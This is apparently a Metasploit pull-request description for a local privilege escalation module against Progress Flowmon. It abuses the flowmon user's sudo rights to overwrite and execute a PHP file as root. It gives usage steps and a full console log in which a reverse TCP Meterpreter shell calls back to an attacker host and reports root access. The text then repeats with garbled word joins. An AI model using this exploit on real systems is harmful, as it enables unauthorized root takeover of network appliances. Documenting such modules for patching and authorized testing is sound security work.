This adds a local privesc exploit module which abuses the sudoers permissions for the Flowmon user to elevate to root.
Vulnerable Application
Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
flowmon user to root. This is possible due to the
flowmon user being able to run several commands with
sudo. This module exploits the ability to overwrite a
PHP file and execute it with sudo granting full sudo
permissions to the flowmon user and elevating the
shell to a root shell.
Gain a session on a Progress Kemp Loadmaster target as the flowmon user
Do: use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024
Do: set SESSION <session>
Do: set LHOST <your host IP>
Do: run
You should get a shell as the root user.
Scenarios
Flowmon 12.2
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/linux flowmon @ flowmon.my3m4o21xjze5fomt 138.111.211.11:4444 -> 172.174.209.1
xp5e53h2h.bx.internal.cloudapp.net 01:50756 (10.1.0.4)
msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options
Module options (exploit/linux/local/progress_flowmon_sudo_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
TEMP_PAYLOAD /tmp/sCmGZ yes The temporary name to use to store the payload.
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 138.111.211.11 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
[*] Overwriting /var/www/shtml/index.php with payload
[*] Executing sudo to elevate privileges
[*] Replacing index.php with original file
[+] Deleted /tmp/sCmGZ
[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000
meterpreter > sysinfo
Computer : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
This adds a local privesc exploit module which abuses the sudoers permissions for the Flowmon user to elevate to root.
Vulnerable Application
Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
flowmon
user toroot
. This is possible due to the flowmon user being able to run several commands withsudo
. This module exploits the ability to overwrite a PHP file and execute it withsudo
granting fullsudo
permissions to theflowmon
user and elevating the shell to a root shell.For more details on the vulnerability: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
This application is available in cloud marketplaces:
Verification Steps
flowmon
useruse exploits/linux/local/pprogress_flowmon_sudo_privesc_2024
set SESSION <session>
set LHOST <your host IP>
run
root
user.Scenarios
Flowmon 12.2